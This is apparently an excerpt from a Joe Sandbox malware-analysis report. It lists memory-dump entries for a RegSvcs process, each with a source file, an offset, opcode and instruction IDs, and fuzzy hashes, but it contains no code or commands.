                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4a3537d288fb890823f447c6ad71ebb37c321d593d3475a628d4cd04593d960c
                                                        • Instruction ID: b3c56620ce5e743fa9a905c6f4f0da6aa68d5c5eedbddb329a7d03295d15f492
                                                        • Opcode Fuzzy Hash: 4a3537d288fb890823f447c6ad71ebb37c321d593d3475a628d4cd04593d960c
                                                        • Instruction Fuzzy Hash: 08E0E5721091A5AFC701CB9998119A6BFACEE4A12470880ABF994CB292D569DA1297A0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aba3383fbba19f0f0150895e92b4b25fb922d5401917dd86bab4084fbb3bde15
                                                        • Instruction ID: 7a964e8c09d279c5a11c950a5a1821653ae9c299d662a8390be85cb4fc2eaa4c
                                                        • Opcode Fuzzy Hash: aba3383fbba19f0f0150895e92b4b25fb922d5401917dd86bab4084fbb3bde15
                                                        • Instruction Fuzzy Hash: 1DE0DF7320005C6FD700CE84CC02EF63BACEB49261F18800AF914C2291C93ADC229BF0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c8699e9c07e3225b2aed93765806ebe9ecb93ba4db6b674948eb1805752dc7dd
                                                        • Instruction ID: dd25dc2eeffe077d1b2a2a06ccb5a1519dd63bec3d4bd68c4887dff15a50fd55
                                                        • Opcode Fuzzy Hash: c8699e9c07e3225b2aed93765806ebe9ecb93ba4db6b674948eb1805752dc7dd
                                                        • Instruction Fuzzy Hash: FEE04F725045986FC351CA99CC21AA67BEC8A4A121B08C097B9A4D6292D5AEDD019BB0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b303421dd4c1680a784af8befbe17594025d0dce7eb84e660d9e2d29b40ab205
                                                        • Instruction ID: 285a79455f4a449aa85e31d7329609ccfb64ef8386dd5fef2486841e8371c661
                                                        • Opcode Fuzzy Hash: b303421dd4c1680a784af8befbe17594025d0dce7eb84e660d9e2d29b40ab205
                                                        • Instruction Fuzzy Hash: 1AE048311051596FC701CF84DC50CA6FF79DF4A210704849BF88487252C676DC26D760
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0536caf7ceb9f75eac2cb5ed700425331d349e3c287d6955695e26d7a4b6c2a3
                                                        • Instruction ID: 5b293b7fa061db8f742d3279ae7b8a64445dcd065c1b346aad95c6eedc3a7899
                                                        • Opcode Fuzzy Hash: 0536caf7ceb9f75eac2cb5ed700425331d349e3c287d6955695e26d7a4b6c2a3
                                                        • Instruction Fuzzy Hash: 1EE01236104258AFC7028F89DC108AA7F69DF4A2207048096FD84CB152C6729D21D770
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 98be6ff450d700bc667ad1df5e74772753bd82e12776b2b2618e0a3d5bd4ab39
                                                        • Instruction ID: 6919698344968f7d3f1fedf3dfb1745041ebcb44b70b194fc0d789ad1e96b6d2
                                                        • Opcode Fuzzy Hash: 98be6ff450d700bc667ad1df5e74772753bd82e12776b2b2618e0a3d5bd4ab39
                                                        • Instruction Fuzzy Hash: 2DE0C2733140901BC3004A593C8593BAF9AE7CA66DB95082BF105D3341CC228C0583A0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 664f35d6e9b6a0b8d0af0c68ad880da06b61d7390ef2d4ad81f92f49d285d556
                                                        • Instruction ID: ab42ce4db648e4beb32346b8b6c2f302b8672c3b12da0919521848ec76e6fc6f
                                                        • Opcode Fuzzy Hash: 664f35d6e9b6a0b8d0af0c68ad880da06b61d7390ef2d4ad81f92f49d285d556
                                                        • Instruction Fuzzy Hash: 83E04F721040A87F8B41CE99CC10DFB7FED9A4D111B08804BFDA4C2242C57AD922EBB0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 273022e1922de0df81f07f88d3aa607f60bbb07d79619248df430b628fef0cd1
                                                        • Instruction ID: a4f3f6cce7dd8e6c88531abd3883053c1f35fdaa89b90a9d7d8aed3d07c70b95
                                                        • Opcode Fuzzy Hash: 273022e1922de0df81f07f88d3aa607f60bbb07d79619248df430b628fef0cd1
                                                        • Instruction Fuzzy Hash: 0AE0DF30505508EBCB41DFE4E90069AFBA5FB4B204F1080D9E90597310DA32AE02EB81
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4e0b4f3b715b4e715594c2d7b60106420a3cc3a871e522002921f440674a4e1e
                                                        • Instruction ID: 8c45fe897462fa3af9e79d3c82f6a76e9db297b7417469dbfe9520206cfadcb0
                                                        • Opcode Fuzzy Hash: 4e0b4f3b715b4e715594c2d7b60106420a3cc3a871e522002921f440674a4e1e
                                                        • Instruction Fuzzy Hash: DBD05E2732401033D658105DBC8A7EBEADDEBC9961F94403BF91DE7745ED108C0542A5
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f799511eeb21dd98db77a8b378c81c1f3452f49d22aa1a66e07b5c327beff745
                                                        • Instruction ID: 273a3a3660194511155bd622da14adc1e73f186349578d1c6899e294c9485504
                                                        • Opcode Fuzzy Hash: f799511eeb21dd98db77a8b378c81c1f3452f49d22aa1a66e07b5c327beff745
                                                        • Instruction Fuzzy Hash: 86F0C975A00119CFDB00CF54E885A9DFBF1FB84318F1180A6E619AB612D330A9418B50
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ab6eca016acbf76b47b293b963eca82c563f96ae6d6087d41204842f092c2459
                                                        • Instruction ID: ef9dffec0f81c22c16546292d85c4e7f72601e0970888155b54dff20a476c8f8
                                                        • Opcode Fuzzy Hash: ab6eca016acbf76b47b293b963eca82c563f96ae6d6087d41204842f092c2459
                                                        • Instruction Fuzzy Hash: DCE046B0109142AFC7468F18C842044BF72EF8B21831880E9E884CF622CF36D826DB81
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c803e8f251948732c1228b14bec6a5bd8a66f5f9b93d68955fbdbbcd09189bc
                                                        • Instruction ID: 0777e95eb64391c98a24d3c1e703eac6db7148949b08a6299afb6a6296b515fa
                                                        • Opcode Fuzzy Hash: 3c803e8f251948732c1228b14bec6a5bd8a66f5f9b93d68955fbdbbcd09189bc
                                                        • Instruction Fuzzy Hash: 68D01733901208ABDB40DBA4E80278EB7F8EB05220F5001AAE508E3240ED35AA146781
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 010195329c747bed270b338d7ac637e3f42b143e3886f271351e42b77445b087
                                                        • Instruction ID: f7b45790040d63b54f742a95db18ce3139f138b92fe394a32ad540d024a8af77
                                                        • Opcode Fuzzy Hash: 010195329c747bed270b338d7ac637e3f42b143e3886f271351e42b77445b087
                                                        • Instruction Fuzzy Hash: 70E0C2716585825FE3955318D8267B72F69CBC9705F0580A6A0429B6CACD6E0C0647AA
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6dfc402e1df996a094bd192477192a49af05d93f8d3e173f7828e7e711db1e6b
                                                        • Instruction ID: b1f78e58a9d7cc29dd0486f8d7453d3d021c74982e5ae9422d0f2e5d641030b8
                                                        • Opcode Fuzzy Hash: 6dfc402e1df996a094bd192477192a49af05d93f8d3e173f7828e7e711db1e6b
                                                        • Instruction Fuzzy Hash: 01E04F31104249AFCB028F84DC55CAABF79EF4E210705809AFD448B222CA729C22D7A1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ef1c0c7c56b719cd860b4f4a5798e2c947ce0f05e1de7dc0925a6e333bbaa7cc
                                                        • Instruction ID: 1d16dd14e04cf11261ff94b18ba7700eb739e851433d3384fd89e0ed1371197c
                                                        • Opcode Fuzzy Hash: ef1c0c7c56b719cd860b4f4a5798e2c947ce0f05e1de7dc0925a6e333bbaa7cc
                                                        • Instruction Fuzzy Hash: 96E04F30A0110EEFCB04EFB8E9419AE77F6FB84208F104569C409E7351DE7A6E01DB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 105d8d0191dff9942f6fc0f41b9e47ea18d52557c5913ba66a00c7896966dc15
                                                        • Instruction ID: a0a904d0ff56f5197679ff02bec6581a1ee25892d3c3603ca44e964b8ebccf81
                                                        • Opcode Fuzzy Hash: 105d8d0191dff9942f6fc0f41b9e47ea18d52557c5913ba66a00c7896966dc15
                                                        • Instruction Fuzzy Hash: 7DD0123631451467D7055A89E800EAB7B9EE7C8761F158026F606CB344CA759C1257E1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1022b631ee60258575cedc72afc05ae9a8fee710ec3c8ed13cf449163d906f4b
                                                        • Instruction ID: 20739ff9058802f9420e1eb9af7baf5551e600cca563434839f05632615821a0
                                                        • Opcode Fuzzy Hash: 1022b631ee60258575cedc72afc05ae9a8fee710ec3c8ed13cf449163d906f4b
                                                        • Instruction Fuzzy Hash: A5D05B73501248ABDF01DAB4E8017DEFBF8D745360F6145A6D404E7640ED355B416741
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 255476e72fbbf8cd721438c4afb48e675d30e927b51154a225819cac6f29826e
                                                        • Instruction ID: 1d6fa2599ddc0312f448f495079b30b6dc659d33a47186ea55ff1cc1addb5140
                                                        • Opcode Fuzzy Hash: 255476e72fbbf8cd721438c4afb48e675d30e927b51154a225819cac6f29826e
                                                        • Instruction Fuzzy Hash: CED05EB6118011AFF204CA04ED02E77B7A9EBC8B20F24C40EB840A3340CA66DC078672
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 422e6dcea8aeecf50b1af3e9fc6bf360d0de3243ce24d7bde51770a657642ced
                                                        • Instruction ID: 2b455667df64023bbd3a7ba9b6447cade010d77e0ca41879406763c7435e6f52
                                                        • Opcode Fuzzy Hash: 422e6dcea8aeecf50b1af3e9fc6bf360d0de3243ce24d7bde51770a657642ced
                                                        • Instruction Fuzzy Hash: A5E0C2335142018FD304EA68D942EDAB7F5EBC5730F18891FE40097340DE65DC87C6A1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0fca987534559789640ce99995214cadacf2e6c3d260a5f6c8f0ad09fd8beca7
                                                        • Instruction ID: 70a1b2bb523caf6bd308d350e88c00f2862aa3ad473f7dfcfd994c3f87f8464f
                                                        • Opcode Fuzzy Hash: 0fca987534559789640ce99995214cadacf2e6c3d260a5f6c8f0ad09fd8beca7
                                                        • Instruction Fuzzy Hash: E6E0C273905148EBC781DBA8A900ADEFBE9EB4B204F1444E6D10AE3120E930AE10A7A1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ad60bf1384eb0248b9c317fb63c7c1d880749f51e3935401d21b3e94908e74e6
                                                        • Instruction ID: 78f1e9734528b0957682137f66b158c820b7ae1a3dfc6deebea8b7e239ad1709
                                                        • Opcode Fuzzy Hash: ad60bf1384eb0248b9c317fb63c7c1d880749f51e3935401d21b3e94908e74e6
                                                        • Instruction Fuzzy Hash: 8DE086321042586FC701CE44CC11C667F79EF45311704C04BFD4487252C673DC12DB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 634da4d3ca85061ac2dc7b96c42b8eaf049aa0b37d6346b90600edce417286ba
                                                        • Instruction ID: b9c8bdb185209ebdd9fd8256a31d85ace6a2a0c5585a43ef4c94e4cad127c635
                                                        • Opcode Fuzzy Hash: 634da4d3ca85061ac2dc7b96c42b8eaf049aa0b37d6346b90600edce417286ba
                                                        • Instruction Fuzzy Hash: 06D02E33900208ABCB80DAE8E9463DFBBF8EB05220F2001E2D404E3A10FC30AA006796
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9df81be541c1aac08099e956e9f72849f325991b2475f2f57572fc8c61acf586
                                                        • Instruction ID: cc730b95acfba40ffed535ba9fc5e554d32b047940edd1014e632d41a3f6287e
                                                        • Opcode Fuzzy Hash: 9df81be541c1aac08099e956e9f72849f325991b2475f2f57572fc8c61acf586
                                                        • Instruction Fuzzy Hash: F9D05E3390120CBFCB50EFA4E9867DEB7F8EB05214F5045A6D518E7E40FD31AA146B96
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d83bf62e183440d6fee1ab221ee54ebbf639f792d92c5ea1740aa17ce113a59
                                                        • Instruction ID: fd1fa3aaac8f3fe77f30437207a5701a7f23713efd2471bc665afbd5ed97722b
                                                        • Opcode Fuzzy Hash: 8d83bf62e183440d6fee1ab221ee54ebbf639f792d92c5ea1740aa17ce113a59
                                                        • Instruction Fuzzy Hash: 86E0263150E1619BF716AB30945A2D93FA19F02328B0D01A7D9449F04BCF25184B4F83
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eb507feb43d02d7050b1c11a511589b17c7f752314a8c54371831b88e53f7d05
                                                        • Instruction ID: 50c541c20525a930c7f29b08fff270c4ca648f3741f6fb1d07079a3d214a2ded
                                                        • Opcode Fuzzy Hash: eb507feb43d02d7050b1c11a511589b17c7f752314a8c54371831b88e53f7d05
                                                        • Instruction Fuzzy Hash: F7E012712082D05FD352D76888618A6BBF5AFCA60071DC8DFA4D487253CA559C17C7A1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a216e8615a6c4db96d0842b4e7f1a829e7525faf2d65337b50480ec92f10e861
                                                        • Instruction ID: a771b2955f4e3bcd9e4a203d8834220d59d27de1aa6853354e5cacf5955db7c9
                                                        • Opcode Fuzzy Hash: a216e8615a6c4db96d0842b4e7f1a829e7525faf2d65337b50480ec92f10e861
                                                        • Instruction Fuzzy Hash: 2EE0EC7510C2D05FD602DB65D9A18A6BFA6DF8B510B09888FE4C1976A2C5129D07DB32
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a385f7af6dc339c1c62a09f80dfa6e28168c3e855fb78b72949cfd3f19e5ddee
                                                        • Instruction ID: 6dac3aa9c7a7708bbf93295c9a0188d42e164a1ff181e5f04b454d3a82e90b8b
                                                        • Opcode Fuzzy Hash: a385f7af6dc339c1c62a09f80dfa6e28168c3e855fb78b72949cfd3f19e5ddee
                                                        • Instruction Fuzzy Hash: 98E0863090E2C4AFCF02CBF854954DEBFF18E4B10071505D6D4C4DB512D5250919DB15
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15c147f1beddb229fe0780a148388d7ab474fcda24833a1526d7953ae18e8610
                                                        • Instruction ID: d1e29393a1616b3c11627abbf401c3e776ca6f74d25d32a03eb45366add2b257
                                                        • Opcode Fuzzy Hash: 15c147f1beddb229fe0780a148388d7ab474fcda24833a1526d7953ae18e8610
                                                        • Instruction Fuzzy Hash: AAD02BB2508211AFD345CA1CDC20DAAB7E9DFD6B10704C44FB884D3201C562CC07CBB2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 677186bcb071e0467d301ab3c8695c0e3d18e2e6dc34d50b7578d044afb9018f
                                                        • Instruction ID: d67e615cdc3ad36b59e8c67076f9446a7bab2a3ade4a5b72fe7dfef94b5e2b80
                                                        • Opcode Fuzzy Hash: 677186bcb071e0467d301ab3c8695c0e3d18e2e6dc34d50b7578d044afb9018f
                                                        • Instruction Fuzzy Hash: A6E04F30A0120EEBCB04EF68ED518AE77F6FB80214B100168C409A7311DA3A3E00CB80
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f109d1ae144be1fad7b3c9466e382589c0a542c431b23080387a0ec8b1fc917e
                                                        • Instruction ID: af00fd6979b26141dc9337ed6724d9ce4ecfbbbf58e0a8154cfd86f23f7d48b2
                                                        • Opcode Fuzzy Hash: f109d1ae144be1fad7b3c9466e382589c0a542c431b23080387a0ec8b1fc917e
                                                        • Instruction Fuzzy Hash: 63D012772082401FE305C214CC526556BB2AB9A224F2D806AD045CB3A2DD2AD9438611
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ad549bd310cfd7369884bd160bdd49b9c1911b260e50c140f9210421daf22e5c
                                                        • Instruction ID: eb23cf204666e15cc2990e21ff7a1f90b9e25cd475e51be8bfb148da4b447914
                                                        • Opcode Fuzzy Hash: ad549bd310cfd7369884bd160bdd49b9c1911b260e50c140f9210421daf22e5c
                                                        • Instruction Fuzzy Hash: 91E0867150A3889FCF42DFB8A4105DDFFF8AE0710471949E6D488D7113D9319904DF52
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 49bec1adbdd607e6d40542e0f5ee0b269763f6f04078961a161352a179076708
                                                        • Instruction ID: b7c15f5d6199f36f7ff641d71568f529fc96a3582e1d2df4f696ef0e7959edf5
                                                        • Opcode Fuzzy Hash: 49bec1adbdd607e6d40542e0f5ee0b269763f6f04078961a161352a179076708
                                                        • Instruction Fuzzy Hash: 05E0EC721041586F8B41CE89D811CB67BADDB89260704805ABD5486251C672DD229BB0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a2fca82d00f510ac08df590a1281c18d020f7b73cf48d032ea1b4095e3d69e3
                                                        • Instruction ID: 46ec8461fe57af0b986f3bcbd372109c73865ecc67ff4d68f12c641489f64b92
                                                        • Opcode Fuzzy Hash: 9a2fca82d00f510ac08df590a1281c18d020f7b73cf48d032ea1b4095e3d69e3
                                                        • Instruction Fuzzy Hash: 95E012752081419FD742DB64E9919D6BBB6DFC9600B19849EF48047212C6229C1BD762
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1790754205bd7c4a3dbd1ce026f32f66516f638823c95c9f8799240f87cb51a0
                                                        • Instruction ID: 5249fa982809205df9940a9cf5ae480a4256b05080362d99cbb5f1be859da8aa
                                                        • Opcode Fuzzy Hash: 1790754205bd7c4a3dbd1ce026f32f66516f638823c95c9f8799240f87cb51a0
                                                        • Instruction Fuzzy Hash: 0CE0E21010E2C01FD702A338886B586BFB08E8B12430980CBC4C58F1A7D519990BD765
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0861eb5959af1b3a2c485b51b88603adbbf0d818df59c5e546975774a972e5ad
                                                        • Instruction ID: f0ac4d3c178f1173eb4568df16c7a3dd3bb43e21662e3dfb54090ee05aa74816
                                                        • Opcode Fuzzy Hash: 0861eb5959af1b3a2c485b51b88603adbbf0d818df59c5e546975774a972e5ad
                                                        • Instruction Fuzzy Hash: E9D0A5731381115BD184D544DC43EE3B359F7D5254F58945FE410C3705D652DC06C691
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc3e518d15db55ea632922c31a657c49d6ef38553c13131000b2b62874abc417
                                                        • Instruction ID: 8bff1ef0c01979c46321abd4bfef1b0ff6cbe6156293dd9d74117cdf62036239
                                                        • Opcode Fuzzy Hash: fc3e518d15db55ea632922c31a657c49d6ef38553c13131000b2b62874abc417
